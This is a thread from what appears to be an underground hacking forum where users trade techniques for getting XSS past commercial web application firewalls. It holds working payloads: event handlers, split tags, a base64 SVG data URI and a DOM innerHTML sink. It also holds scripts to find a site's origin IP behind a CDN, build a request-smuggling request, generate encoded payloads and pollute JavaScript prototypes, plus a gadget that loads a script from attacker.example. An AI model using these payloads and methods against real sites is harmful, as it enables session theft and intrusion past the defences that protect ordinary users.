• XSS.stack #1 – the first literary journal from the forum's users

Do modern XSS Bypass techniques still work against advanced WAFs?

_Sentap

Data Thug
Premium
Joined
14.05.2025
Messages
58
Reactions
52
Deposit
0.00
i was messing around with this penetration testing project lately... got stuck dealing with this super tough WAF... like, it was blocking pretty much every classic XSS payload i threw at it. tried all sorts of weird encoding tricks, played with event handlers, even dabbled in some DOM-based stuff... but this WAF? it’s like it saw everything coming! kinda frustrating...


anyway, here's my question... are there still some creative tricks out there for bypassing modern WAFs... like cloudflare, aws WAF, or akamai? stuff that actually works in the real world? i wanna know...
 
There is no fixed method for bypassing a WAF. Each WAF admin may have configured it in a specific way, and if they’ve made mistakes in the configuration, you can potentially exploit those.
Currently, two approaches come to my mind that I can suggest to you:

1. Set up the WAF locally in your own virtual lab environment, understand how it works, and then think about ways to bypass it.

2. Find the server's original IP address and send requests directly to it so the WAF won't block you.
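To make approach 2 concrete, here's a minimal sketch (stdlib Python only) of building a request that connects to a suspected origin by IP while keeping the CDN-fronted hostname in the Host header, so name-based vhost routing on the origin still matches. The IP 203.0.113.10 and hostname victim.example are placeholders, not real targets:

```python
# Sketch for approach 2: talk to the suspected origin IP directly, but keep
# the real hostname in the Host header. 203.0.113.10 / victim.example are
# placeholders for illustration only.

def build_origin_request(hostname: str, path: str = "/") -> bytes:
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {hostname}",   # real vhost, even though we connect by IP
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()

raw = build_origin_request("victim.example")
# Send with: socket.create_connection(("203.0.113.10", 80)).sendall(raw)
print(raw.decode())
```

If the response matches what the CDN-fronted site serves, you've probably found the origin.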
 
your response ain't bad, but i kinda feel like there's some room for doubt about how well these methods hold up in real-world scenarios... for bypassing, your idea of setting up a WAF in a local environment sounds solid, but how do you make sure the WAF setup in the lab is exactly like the real deal? like, cloudflare or akamai got all these dynamic rules and auto-updates... how do you simulate that stuff?

and that part where you mentioned finding the server's real IP, that makes sense too, but if the server’s sitting behind a CDN like cloudflare and the real IP only routes through the WAF, hitting the IP directly just wont work... what technique do you use to be sure you got the right IP? maybe digging into DNS history or using some tool like dnsdumpster?

i dunno, these methods feel a bit... oversimplified? modern WAFs, like AWS WAF, they’re using machine learning to spot payloads... what’s your take on that? you got any other creative ideas for testing, like messing with encoding or maybe DOM-based XSS stuff?
 
It depends on multiple factors. For example, a lot of people and services use a free CDN/WAF tier, which has only basic protection, even against XSS injection. Gh0stByte is right: buy yourself a server (not local), put it behind Cloudflare, install nginx with ModSecurity and enable it, ask GPT to make you an XSS-vulnerable index page, and try to attack it. Vary your methods and check the access/error logs of both nginx and the cloud WAF. Most WAFs have different configs and different protection types, but you can still find bypasses around them.
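If you'd rather not ask GPT for the vulnerable index page, a deliberately reflected-XSS page is a few lines of stdlib Python. The port and page markup here are just arbitrary lab choices:

```python
# Deliberately vulnerable "search" page to put behind your lab WAF.
# Stdlib only; port 8080 and the markup are arbitrary lab choices.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

def render(q: str) -> bytes:
    # Reflects user input with no escaping -- that's the whole point of the lab.
    return f"<html><body>You searched for: {q}</body></html>".encode()

class VulnIndex(BaseHTTPRequestHandler):
    def do_GET(self):
        q = parse_qs(urlparse(self.path).query).get("q", [""])[0]
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(render(q))

def serve(port: int = 8080) -> None:
    HTTPServer(("127.0.0.1", port), VulnIndex).serve_forever()

# serve()  # then try http://127.0.0.1:8080/?q=<svg onload=alert(1)>
```

Point your local nginx + ModSecurity at it and watch which payloads reach the backend log versus get blocked.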

Many WAFs block <script>, but you can use methods such as:

JavaScript:
<iframe src="javascript:alert(1)">
(obscure tags to break filters) or
JavaScript:
<math><mi xlink:href="javascript:alert(1)"></mi></math>


To bypass the event handler:
JavaScript:
<body onload=alert(1)>

or

JavaScript:
<div onclick=alert(1)>Click me</div>

You can also use a split-tag payload; a filter that strips <script> only once leaves a working tag behind:
JavaScript:
<scr<script>ipt>alert(1)</scr</script>ipt>

DOM-based XSS (attacker-controlled location.hash flowing into innerHTML):

JavaScript:
let search = location.hash;
document.body.innerHTML = search;

Triggered via a URL like:
https://victim.com/#<img src=x onerror=alert(1)>


My favorite is:
JavaScript:
<img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+">
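In case anyone wants to regenerate or sanity-check that data: URI, the base64 part decodes to exactly the SVG snippet:

```python
import base64

# Encode the SVG snippet into the base64 data: URI used in the payload above.
svg = b"<svg onload=alert(1)>"
b64 = base64.b64encode(svg).decode()
payload = f'<img src="data:image/svg+xml;base64,{b64}">'
print(payload)
# b64 == "PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+"
```

Handy when you want to swap in a different SVG body without hand-encoding it.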
 
It should be noted that bypassing a WAF requires continuous trial and error, as each WAF exhibits different behavior.
 
your response ain't bad, but i kinda feel like there's some room for doubt about how well these methods hold up in real-world scenarios... for bypassing, your idea of setting up a WAF in a local environment sounds solid, but how do you make sure the WAF setup in the lab is exactly like the real deal? like, cloudflare or akamai got all these dynamic rules and auto-updates... how do you simulate that stuff?
You're absolutely right; accurately simulating advanced WAFs like Cloudflare or Akamai, with all their dynamic rules and automatic updates, in a local environment is extremely challenging and often impossible. You're justified in having doubts about this. The purpose of setting up a WAF in a local environment is more about understanding the general principles and mechanisms of how WAFs operate and testing general bypass techniques, rather than precisely reconstructing a specific WAF with all its complexities.

Sometimes, information about how specific WAFs operate or their rule categories is publicly disclosed (e.g., in blogs, security conferences). You can use this information to fine-tune your local WAF setup more accurately.

There are some tools and techniques for WAF fingerprinting that can help you identify the type of WAF and, occasionally, some of its default rules. Of course, this is more for identification than for complete simulation.

Start with a basic configuration and gradually enable stricter rules on your local WAF to see how you can manage to overcome them.

Always remember that successfully bypassing a local WAF doesn't guarantee success against an advanced, up-to-date WAF in the real world. However, it helps you develop the necessary mindset and skills to face them.

and that part where you mentioned finding the server's real IP, that makes sense too, but if the server’s sitting behind a CDN like cloudflare and the real IP only routes through the WAF, hitting the IP directly just wont work... what technique do you use to be sure you got the right IP? maybe digging into DNS history or using some tool like dnsdumpster?
Here are a few common techniques for this:

1. Using DNS history and related tools

2. Checking SSL/TLS certificates - Sometimes, the origin server might have an SSL certificate where your domain name is mentioned (e.g., a self-signed certificate or a certificate from another CA used for testing), and this certificate will be different from the one provided by the CDN. If you can connect to the suspected IP (even with a certificate error) and examine the certificate details, it can be a strong clue.

Certainly, there are more techniques, but I didn't feel it was necessary to list them all here.
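Since technique 2 came up, here is a rough stdlib sketch of grabbing whatever certificate a suspected origin IP presents. The IP is a placeholder, and validation is deliberately disabled, because a self-signed or mismatched certificate is exactly the clue you're after:

```python
import ssl

# Rough sketch for technique 2: fetch the certificate a suspected origin IP
# presents and look for the target's domain in its Subject / SAN fields.
# 203.0.113.10 is a placeholder.

def insecure_context() -> ssl.SSLContext:
    # For a manual ssl-wrapped socket: accept any name and any cert.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False        # don't require a matching hostname
    ctx.verify_mode = ssl.CERT_NONE   # accept self-signed certificates
    return ctx

def grab_cert_pem(ip: str, port: int = 443) -> str:
    # With ca_certs unset, get_server_certificate does no chain validation,
    # so self-signed or mismatched certs come back fine.
    return ssl.get_server_certificate((ip, port))

# pem = grab_cert_pem("203.0.113.10")
# Inspect it with: openssl x509 -noout -text   (check Subject and SAN)
```

If the PEM mentions the target's domain but differs from the CDN's edge certificate, that IP is a strong origin candidate.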

i dunno, these methods feel a bit... oversimplified? modern WAFs, like AWS WAF, they’re using machine learning to spot payloads... what’s your take on that? you got any other creative ideas for testing, like messing with encoding or maybe DOM-based XSS stuff?
Advanced play with Encoding and Obfuscation (The art of misleading):

Combining encodings, including lesser-known ones: use multiple layers of encoding (e.g., URL-encode > Base64 > Hex).

Leverage encodings that browsers understand well but that WAFs may have trouble fully interpreting (UTF-16/UTF-32 in specific places, Punycode in parts of the URL or parameters, or even JavaScript-specific obfuscators like JSFuck, JJEncode, or hieroglyphy).

Use String.fromCharCode() in JavaScript with numeric values (decimal, hex, octal) to build XSS payloads dynamically.
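That String.fromCharCode() trick is easy to script. A toy generator (the eval() wrapper is my addition, since fromCharCode only returns a string and doesn't execute it):

```python
# Toy generator for the String.fromCharCode() trick: the string "alert(1)"
# never appears literally in the request, only its character codes.

def from_char_code(js: str) -> str:
    codes = ",".join(str(ord(c)) for c in js)
    return f"String.fromCharCode({codes})"

inner = from_char_code("alert(1)")
payload = f"<img src=x onerror=eval({inner})>"
print(payload)
# inner == "String.fromCharCode(97,108,101,114,116,40,49,41)"
```

Any filter matching on the literal substring "alert" in the onerror attribute will miss this form.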

Polyglot Payloads:

Creating payloads that are valid in multiple contexts. For example, a payload that is simultaneously a valid HTML string, a valid SQL comment, and a valid JavaScript command. The WAF might detect it as harmless in one context, while in another context it is interpreted maliciously by the browser or server.

Obfuscation with non-printing or invisible characters and complex commenting: Usage of various whitespace characters (like non-breaking space, en space, em space, zero-width space) or control characters that the WAF might ignore or misinterpret, but the final interpreter (browser, database) processes them.

Usage of nested comments or comments with special syntax in SQL, HTML, JS that confuse the WAF. (e.g., /*! SQL Specific Comment */ in MySQL).

Injection through indirect sources: Instead of direct injection into a clear sink, try to inject data into the DOM through localStorage, sessionStorage, window.name, document.cookie (if it is not properly isolated), or even through postMessage from another iframe or window.

JavaScript Gadgets and Prototype Pollution: Finding code snippets (gadgets) present in JS libraries used by the website that can execute malicious code with input controlled by the attacker.

A Prototype Pollution attack can change the properties of global JavaScript objects and lead to XSS in places where you don't expect it at all. This type of attack is very hard for WAFs to detect.

Mutation XSS (mXSS): Sending seemingly harmless HTML or XML that when parsed and "corrected" (mutated) by the browser, turns into malicious code. The WAF sees the initial HTML and might detect it as harmless.

Usage of Template Literals and new JS functions: ES6 and newer versions of JavaScript have features (like template literals ${...}, arrow functions) that can be used to create XSS payloads in new and lesser-known ways for WAFs.

Service Workers and WebAssembly (WASM): If you can register a malicious service worker, you can have a lot of control over requests and responses on the client-side and bypass the WAF.

WASM payloads are almost a black box for WAFs and their analysis is very difficult.

HTTP Request Smuggling (HRS) / HTTP Desync Attacks: If the infrastructure (load balancers, reverse proxies, web servers) is not configured correctly, these attacks can allow you to hide one request inside another request and send it directly to the backend server, completely bypassing the WAF and even poisoning the cache.
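To make the HRS idea concrete, this is the shape of the classic CL.TE desync request, as popularized by the PortSwigger labs. The host is a placeholder and this only works against misconfigured lab setups:

```python
# Classic CL.TE desync shape: the front end trusts Content-Length and
# forwards everything below as one request; a back end that trusts
# Transfer-Encoding stops reading at the 0 chunk, so the stray "G" stays
# in its buffer and prefixes the NEXT request on that connection
# (turning a following "POST /" into an invalid "GPOST /").
# victim.example is a placeholder; lab use only.

body = b"0\r\n\r\nG"   # chunked terminator + one smuggled byte
request = (
    b"POST / HTTP/1.1\r\n"
    b"Host: victim.example\r\n"
    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + body
)
print(request.decode())
```

A real exploit replaces the single "G" with a full smuggled request, but the Content-Length/Transfer-Encoding disagreement is the whole trick.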
 
Wow, that’s a seriously detailed response—big props for diving so deep! I’m definitely taking notes on some of these ideas, especially the encoding tricks and mutation XSS stuff. The way you broke down polyglot payloads and prototype pollution was eye-opening; I hadn’t thought about combining contexts like that to slip past a WAF.


Couple of follow-ups, if you don’t mind:


  1. Encoding and Obfuscation: You mentioned layering encodings like URL > Base64 > Hex or using stuff like UTF-16/UTF-32. Have you seen these work against something as beefy as Cloudflare’s ML-based rules? Like, do you think throwing in something super obscure like Punycode in a URL parameter could still trip up their detection, or are they catching up to these tricks? Any go-to tools or scripts you’d recommend for generating these layered payloads?
  2. Mutation XSS: The mXSS idea sounds wild, but I’m curious how you’d approach crafting one in practice. Say you’ve got a site that’s reflecting user input into HTML but sanitizing it pretty aggressively—how do you figure out what “harmless” input might get mutated by the browser into something spicy? Is it mostly trial and error, or are there specific patterns you look for?
  3. Prototype Pollution: I’ve read about this but never tried it in a real pentest. You said it’s tough for WAFs to detect, which makes sense since it’s more about messing with the app’s logic than a straight-up payload. Got any tips on how to spot a site that might be vulnerable to this? Like, are there specific JS libraries or frameworks that are more prone to it?

Oh, and about the HTTP Request Smuggling part—that’s super intriguing, but feels like it’d need some serious recon to pull off. Have you ever seen it work in the wild against a modern setup with a CDN + WAF combo? I’m wondering how common misconfigs like that are these days.


On my end, I’ve been messing with some DOM-based XSS ideas lately, like trying to abuse postMessage or window.name as you mentioned. One thing I’ve noticed is that some sites don’t properly validate the origin of postMessage, which can let you sneak in some fun stuff. But yeah, modern WAFs are such a pain when they start sniffing out your payloads with ML.


What’s your take on combining some of these techniques? Like, maybe using a polyglot payload with some mXSS flavor to target a DOM-based vector? Or is that overcomplicating things? 😅
 
Thank you very much, ChatGPT!
 
In general, WAFs are bypassed via various loopholes in their documented behavior. Some geniuses come up with ways to bypass the filters themselves, but as our friend with ChatGPT noted, this is often impossible. All Cloudflare and Akamai bypasses are private and get fixed very quickly. So if we are talking about Cloudflare, look for the real IPs behind the reverse proxy; if we are talking about Akamai and Amazon, chain other vulnerabilities instead - XXE, LFI, etc.
 
i totally agree that bypassing modern WAFs like cloudflare, aws waf, or akamai ain't easy at all... most bypasses are either private or get patched super quick. finding the real ip behind cloudflare is such a cool idea tho... sometimes you can crack open a path that way (using tools like subfinder or some osint tricks). i'm totally on board with chaining vulnerabilities like xxe or lfi too... those usually work when you spot another weak point in the system and can exploit it...
got a question tho. in your experience, what kind of techniques do you focus on when testing WAFs? like, do you mostly hunt for misconfigurations? or do you try to craft creative payloads? maybe you've worked on stuff like rate-limit bypass or api abuse? really wanna hear your thoughts!
 
put the waf in the shitter. flush it. CF bypass can cost you $8kk
 
what, you got a chip on your shoulder or just naturally a sourpuss? we’re trying to keep it technical here... so maybe dial it back and play nice, yeah?
 
Encoding and Obfuscation: You mentioned layering encodings like URL > Base64 > Hex or using stuff like UTF-16/UTF-32. Have you seen these work against something as beefy as Cloudflare’s ML-based rules? Like, do you think throwing in something super obscure like Punycode in a URL parameter could still trip up their detection, or are they catching up to these tricks? Any go-to tools or scripts you’d recommend for generating these layered payloads?
So, you know, when we talk about URL encoding a string first, then Base64, and then Hex, that's what I'd call a classic obfuscation method. I've seen older WAFs, the ones that only did a single layer of decoding, sometimes get tricked by these. But with modern WAFs, especially the ML-based ones, it’s a bit of a different story.

From what I understand, they usually have a multi-layer decoding capability. I mean, they're generally designed to spot and decode several layers of common encodings, not just glancing at how the string first appears.

And then there's the behavioral and contextual analysis. My take is, even if an encoded string doesn't directly match a known malicious signature, the ML model can flag it as suspicious based on other contextual clues. For instance, it might consider how common that type of encoding is for that specific parameter, or if that parameter typically handles such complex data, things like that.

Also, I think it's more about risk scoring with these systems, rather than a simple block or don't block decision. They usually assign a risk score to requests based on various factors, and I'd imagine using multiple encoding layers could bump up that risk score.

For example, if you use Punycode in a URL parameter where you wouldn't normally expect it – because, as I recall, Punycode is for international domain names or IDNs – or using UTF-16 or UTF-32 where UTF-8 is the norm, I'd say that can definitely be an anomaly.

And that leads to anomaly detection. From my perspective, ML models are designed precisely for that – to spot anomalies. So, if a particular parameter has always been getting simple ASCII data and then suddenly it receives a complex Punycode string, I'd see that as a potential red flag for the system.

It really comes down to sensitivity to context, in my opinion. I believe the real strength of ML is in understanding that context. A Punycode string in a Host header might be perfectly fine, but that same string in a user_id parameter could look very suspicious to me, and presumably to the system too.

Now, about the possibility of error... I'd say, sure, it's possible such tricks could make the system slip up. In my experience, no security system is 100 percent foolproof.

As for tools, I don't really have a specific one offhand for generating these kinds of payloads myself, but I reckon you could whip up a simple tool for it. For instance, you could make a basic one with Python:
Python:
import base64
import urllib.parse

original_payload = "<script>alert('XSS')</script>"

# Layer 1: Base64-encode the raw payload
payload_b64 = base64.b64encode(original_payload.encode('utf-8')).decode('utf-8')
print(f"Base64 Encoded: {payload_b64}")

# Layer 2: URL-encode the Base64 string (the URL > Base64 layering from above)
payload_url_encoded_b64 = urllib.parse.quote(payload_b64)
print(f"URL Encoded (Base64): {payload_url_encoded_b64}")

# Alternative single layer: hex-encode the raw payload
payload_hex = original_payload.encode('utf-8').hex()
print(f"Hex Encoded: {payload_hex}")

Mutation XSS: The mXSS idea sounds wild, but I’m curious how you’d approach crafting one in practice. Say you’ve got a site that’s reflecting user input into HTML but sanitizing it pretty aggressively—how do you figure out what “harmless” input might get mutated by the browser into something spicy? Is it mostly trial and error, or are there specific patterns you look for?
From what I gather, this whole process is a mix of deeply understanding how browsers work, recognizing common mXSS patterns, and some smart trial and error. Now, I haven't studied or worked on this super deeply myself, but here’s what I do know about it:

So, first, about understanding the difference between a Sanitizer and a browser. When I think of a Sanitizer or a WAF, I see it as usually having a simpler parser. It might operate based on a blacklist or a whitelist, you know, searching and replacing strings, or maybe it builds a partial Document Object Model, or DOM, and then cleans that up. Its main goal, as I see it, is to get rid of known malicious code.

The browser, on the other hand, has what I’d call a very complex and flexible parser. It's built to display any kind of HTML code correctly, or at least acceptably, even if that code is incomplete or incorrect. Browsers often try to, let's say, 'fix' broken code, and that’s where this 'mutation' thing happens, in my understanding.

Then there are these key points where browsers might mutate the code:

One thing is malformed HTML. For instance, with unclosed tags: I believe the browser might close tags in a specific way or interpret the content after them differently than a sanitizer would expect. An example could be something like <img src=x onerror=alert(1) without quotes. Or mismatched or missing quotes, like in <a href='javascript:alert(1)">. Unexpected characters inside tags or attributes: from what I've seen, the browser might interpret these as separators. And incorrect comments: these might get closed by the browser sooner than expected, or so I've heard.
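To make the malformed-HTML point concrete, here's a small Node.js sketch. The stripHandlers filter is a hypothetical blacklist of my own invention, not any real WAF rule: a regex that only matches quoted event handlers silently misses the unquoted form that browsers accept just fine.

```javascript
// Hypothetical blacklist filter: strips event handlers, but only the quoted form.
function stripHandlers(html) {
  return html.replace(/\son\w+="[^"]*"/gi, "");
}

const quoted = '<img src=x onerror="alert(1)">';
const unquoted = '<img src=x onerror=alert(1)>';

console.log(stripHandlers(quoted));   // <img src=x> – handler removed
console.log(stripHandlers(unquoted)); // <img src=x onerror=alert(1)> – handler survives
```

The gap is exactly the kind of parser mismatch described above: the filter models attributes as quoted strings, while the browser's tokenizer happily accepts the unquoted variant.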

Then you have different namespaces, like SVG and MathML. As I understand it, the SVG and MathML parsers are different from the HTML parser. Sanitizers might not handle these namespaces correctly. So, code injection through a <script> tag inside an <svg>, or via event handlers on SVG elements if parts of the SVG are user-controlled, might be possible. I also think the <foreignObject> element in SVG can be an attack vector.

Regarding the <template> element: from what I know, the content of a <template> tag is inert until it's cloned and added to the DOM. A sanitizer might not recursively sanitize the content within the template, or it might do it incorrectly. Then, once the browser activates the template, it will parse its content.

And the usage of innerHTML: The way a string is injected into element.innerHTML can sometimes, as I see it, lead to different parsing results compared to when the browser parses HTML directly from the network stream. I believe this is one of the common sources of mXSS. The browser seems to perform an extra 'correction' step on the string before converting it to the DOM.

Finally, DOM Clobbering: while it's not exactly mXSS, I think it can be a precursor or a supplement to it. If user input can create DOM elements with a specific id or name, it might overwrite global JavaScript variables or their properties, potentially leading to unexpected behavior that could be exploited. That's my understanding, at least.


Now, about the diagnostic process – you asked if it's more based on trial and error or specific patterns? From what I can tell, this process is a combination of both:

First, there are what I'd call known patterns. Security researchers, folks like Mario Heiderich, Gareth Heyes, and the team at PortSwigger Research, have discovered and published common patterns and browser weaknesses. I find these patterns are a good starting point. For example: One thing is using invalid attributes where parts of them get interpreted by the browser as new HTML. Then there's injection into special tags like <style>, <title>, <textarea>, <noscript>, or <iframe>, which, as I understand it, have different parsing rules. Playing around with CDATA in an XML context, like SVG, is another area I've heard about. And also, using special characters or different encodings in unexpected places. I also think the test lists from well-known sanitizing libraries, like DOMPurify – which itself is designed to prevent mXSS – are a fantastic resource for understanding mXSS attack vectors.
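As a tiny illustration of the special-tags point (render here is a made-up template helper, not from any real framework): user text dropped into a <textarea> without escaping can simply close the tag and switch the parsing context back to normal markup.

```javascript
// Hypothetical template helper that embeds user text without escaping.
const render = (comment) => `<textarea>${comment}</textarea>`;

const input = '</textarea><img src=x onerror=alert(1)>';
console.log(render(input));
// <textarea></textarea><img src=x onerror=alert(1)></textarea>
// The closing tag in the input terminates the textarea early,
// so the <img> is parsed as markup instead of inert text.
```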

Next is what I'd call intelligent trial and error, or fuzzing. Since browser behavior can vary a bit between versions and types, and the sanitizer's logic is often a black box, a significant amount of targeted fuzzing and repetitive manual testing is needed, from my point of view.

Differential analysis is a key technique here, as I see it. You give your input to the application, and then you compare the sanitized HTML – what comes back from the server or is produced by a client-side sanitizer – with what the browser actually displays in the DOM Inspector.

Let me try to give a simple conceptual example. Suppose the sanitizer removes <script> tags and the onerror attribute. Your input might be something like: <img src="x" foo="><script>alert(1)</script>">. The sanitizer might see foo as an attribute, remove the inner <script> content, and output: <img src="x" foo=">">. The browser, then, might – and this is where the mutation comes in – because of how it handles an unescaped > in the attribute value, parse this as: <img src="x" foo=""> <script>alert(1)</script> ">. In this scenario, the script tag that the sanitizer thought it removed reappears. (I should say, this is a very simplified example; real-world cases are often more complex and depend on the specifics of how the browser engine parses HTML).
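The differential-analysis idea can be mocked up in a few lines of Node.js. Both functions here are stand-ins I invented for illustration: naiveSanitize plays the blacklist sanitizer, and tagsSeen crudely imitates one property of real browser tokenizers (tag names are matched case-insensitively), which is already enough to surface a divergence.

```javascript
// Stand-in blacklist sanitizer: removes only the literal lowercase tag.
function naiveSanitize(html) {
  return html.split('<script>').join('').split('</script>').join('');
}

// Crude stand-in for a browser tokenizer: collects tag names case-insensitively.
function tagsSeen(html) {
  return [...html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)].map(m => m[1].toLowerCase());
}

const payload = '<ScRiPt>alert(1)</ScRiPt>';
const sanitized = naiveSanitize(payload);

console.log(sanitized === payload); // true – the blacklist never matched
console.log(tagsSeen(sanitized));   // [ 'script', 'script' ] – the "browser" still sees script tags
```

In a real test you would diff the sanitizer's output against what the DOM Inspector shows after the browser parses it; the principle is the same.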

It seems to me that focusing on inputs that appear to break or make the HTML structure incomplete is important. Often, mXSS vectors involve inputs that look like they mess up the HTML structure, but the browser then 'repairs' them in a particular way.

So, I'd say you start with specific patterns, for example, known mXSS vectors for innerHTML, or how the browser handles particular tags in certain contexts. Then, when you encounter a specific sanitizer, you'd move into the trial-and-error phase to see which of these patterns, or slight variations of them, can get past that sanitizer and be mutated by the browser into something malicious.

From what I can tell, finding new mXSS vulnerabilities against strong, modern sanitizers is tough work. It requires patience, creativity, and a deep understanding of browser internals. But when they are found, I believe they are very valuable.

Prototype Pollution: I’ve read about this but never tried it in a real pentest. You said it’s tough for WAFs to detect, which makes sense since it’s more about messing with the app’s logic than a straight-up payload. Got any tips on how to spot a site that might be vulnerable to this? Like, are there specific JS libraries or frameworks that are more prone to it?
So, about understanding the core mechanism here:

When it comes to vulnerable entry points and code patterns:
I think doing a source code review, if the code is available, of course, is the most effective way to go about it. One thing I'd look for is unsafe recursive merge or copy functions. I mean, you'd search for functions that deeply combine, you know, deep merge or clone, two or more objects. If these functions treat the __proto__ key as a valid key and copy its value into the target object, then, in my view, a vulnerability exists. Let me give a very simple example:
JavaScript:
function merge(target, source) {
  // No key filtering: a key named "__proto__" is copied like any other,
  // which is exactly what makes this deep merge exploitable.
  for (let key in source) {
    if (typeof source[key] === 'object' && source[key] !== null) {
      if (!target[key]) target[key] = {};
      merge(target[key], source[key]); // recurses into Object.prototype when key is "__proto__"
    } else {
      target[key] = source[key];
    }
  }
}
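To see that merge actually polluting, here's a self-contained run (same vulnerable merge as above; the isAdmin key is just an arbitrary example property I picked): JSON.parse creates a plain own property named __proto__, the for...in loop walks into it, and the recursive call ends up writing onto Object.prototype.

```javascript
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === 'object' && source[key] !== null) {
      if (!target[key]) target[key] = {};
      merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
}

// JSON.parse defines "__proto__" as an ordinary own property,
// so for...in enumerates it and merge() recurses into Object.prototype.
const malicious = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, malicious);

const victim = {};           // a completely unrelated object
console.log(victim.isAdmin); // true – inherited from the polluted prototype
```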
Then there's the dynamic setting of properties. What I mean is, code that takes a property path from user input and assigns a value to it, that's something I'd consider susceptible. For instance, if you have something like obj[pathPart1][pathPart2] = value;, if you could change pathPart1 or pathPart2 to __proto__, that's where the problem lies, as I see it.

Also, I'd look at how the application uses URL parameters, the JSON body, or postMessage to create or modify objects. It's worth checking, in my opinion, how the program processes these inputs and whether it uses them to build nested object structures.


Black-Box Testing

Now, about black-box testing. I find this more challenging, but not impossible.

For identifying input points, I'd say anywhere the application takes user input and seems to create or modify JavaScript objects with it – whether that's client-side or server-side in Node.js – is a potential spot. This, in my view, includes things like:
- Query parameters in the URL, for example ?config.setting.value=foo
- The JSON request body
- Data sent via window.postMessage
- Form inputs


Susceptible JavaScript libraries and frameworks

And then there are certain JavaScript libraries and frameworks that I've heard are more susceptible:

Talking about older versions of utility libraries: With Lodash, for instance, I understand that versions before 4.17.11 had Prototype Pollution vulnerabilities in functions like _.defaultsDeep, _.merge, _.set, and so on. I believe many projects still use these older versions. Then there's jQuery. Older versions, especially before 3.4.0 from what I recall, could be vulnerable in the $.extend(true, {}, ...) function when doing a deep copy from an unsafe source, like the output of JSON.parse from user input. Underscore.js is another one; similar to Lodash, I think older versions can be vulnerable.

I'd also be wary of URL or Query String processing libraries. Libraries that convert query string parameters into nested objects might create this vulnerability if they don't properly check the keys, for example, converting a[b][c]=val to {a:{b:{c:'val'}}} without scrutiny.
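Here's a sketch of the kind of naive query-string parsing I mean (parseQuery is invented for illustration, it's not qs or any real library): it converts a[b]=1 into nested objects without vetting the keys, so a __proto__ segment walks straight onto the prototype.

```javascript
// Naive query-string → nested-object conversion with no key filtering.
function parseQuery(qs) {
  const out = {};
  for (const pair of qs.split('&')) {
    const [rawKey, value] = pair.split('=');
    const path = rawKey.replace(/\]/g, '').split('['); // "a[b][c]" → ["a","b","c"]
    let cur = out;
    for (let i = 0; i < path.length - 1; i++) {
      // "__proto__" is followed here like any other key.
      if (typeof cur[path[i]] !== 'object' || cur[path[i]] === null) cur[path[i]] = {};
      cur = cur[path[i]];
    }
    cur[path[path.length - 1]] = value;
  }
  return out;
}

console.log(parseQuery('a[b]=1'));   // { a: { b: '1' } }
parseQuery('__proto__[polluted]=1');
console.log({}.polluted);            // '1' – every object now inherits it
```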

Template engines are another area. Some of them, especially those that work unsafely with objects or allow access to nested properties, could be an attack vector, in my opinion, if a polluted object is passed to them.

And libraries that work with YAML or other formats too. If these libraries don't check keys when they deserialize input into JavaScript objects, I think they could be vulnerable.


Finding Gadgets

As I see it, just polluting the prototype isn't enough. For this vulnerability to have a real impact, a 'gadget' needs to be found in the application's code. A gadget, in my understanding, is a piece of code that uses the polluted property from the prototype in a way that leads to an unintended and exploitable behavior. For example:

Code that considers a property as a URL or places it in innerHTML. If this property has been polluted via the prototype, I believe it could lead to XSS.
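A minimal gadget sketch (everything here – renderScriptTag, debugHook – is hypothetical application code I made up, not a known library gadget): the function falls back to a property it believes is optional, never suspecting the value can arrive via the prototype chain.

```javascript
// Hypothetical application code: debugHook is meant to be an optional config property.
function renderScriptTag(cfg) {
  // Gadget: reads a property that may be inherited rather than own.
  return cfg.debugHook ? `<script src="${cfg.debugHook}"></script>` : '';
}

console.log(renderScriptTag({})); // '' – nothing happens normally

// Somewhere else, attacker-controlled input polluted the prototype:
Object.prototype.debugHook = 'https://attacker.example/x.js';

console.log(renderScriptTag({})); // <script src="https://attacker.example/x.js"></script>
```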

Oh, and about the HTTP Request Smuggling part—that’s super intriguing, but feels like it’d need some serious recon to pull off. Have you ever seen it work in the wild against a modern setup with a CDN + WAF combo? I’m wondering how common misconfigs like that are these days.
Yeah, from what I've seen, it definitely still works. It might sound surprising, I know, but even with CDNs, advanced WAFs, and modern infrastructures, I believe vulnerabilities stemming from HRS are still being found. As I understand it, the main reasons for this are:

First off, there's what I'd call Request Chain Complexity. A user's request usually passes through several devices: the user's browser, then a CDN, like Cloudflare or Akamai, then a WAF which might be part of the CDN or separate, then one or more load balancers and reverse proxies, and finally the application's web server, or Origin. The HRS vulnerability, as I see it, happens when at least two devices in this chain understand the boundary of an HTTP request differently. This is usually due to ambiguity in the Content-Length and Transfer-Encoding headers. So, if the CDN sees a request one way, and the backend server, or Origin, or even a load balancer in between, interprets it another way, that's when the possibility of request smuggling arises, in my view.
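The classic textbook shape of that Content-Length / Transfer-Encoding ambiguity (the so-called CL.TE case; the host is obviously illustrative) looks something like this:

```
POST / HTTP/1.1
Host: vulnerable-website.example
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```

A front-end that honors Content-Length forwards all 13 body bytes; a back-end that honors Transfer-Encoding stops at the 0 chunk and treats SMUGGLED as the start of the next request on the reused connection.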

Then, I think there are differences in HTTP Parser implementations. Each of these devices – the CDN, WAF, Load Balancer, web server – has its own specific HTTP parser. These parsers might have been written by different teams and with varying degrees of adherence to RFC standards, or even different interpretations of those standards. I believe these differences can create gaps for HRS attacks.

And also, CDNs and WAFs can themselves be the vulnerable point or even create the vulnerability. Sometimes, from what I've read, the CDN or WAF itself can be one of the vulnerable parties in an HRS attack. In other cases, the CDN or WAF might 'normalize' or change requests in such a way that they unintentionally create a vulnerable situation for HRS between themselves and the backend server. For instance, a CDN might remove or alter an ambiguous Transfer-Encoding header, but the backend server might still act based on it, or vice versa. That's how I see it, anyway.

What’s your take on combining some of these techniques? Like, maybe using a polyglot payload with some mXSS flavor to target a DOM-based vector? Or is that overcomplicating things? 😅
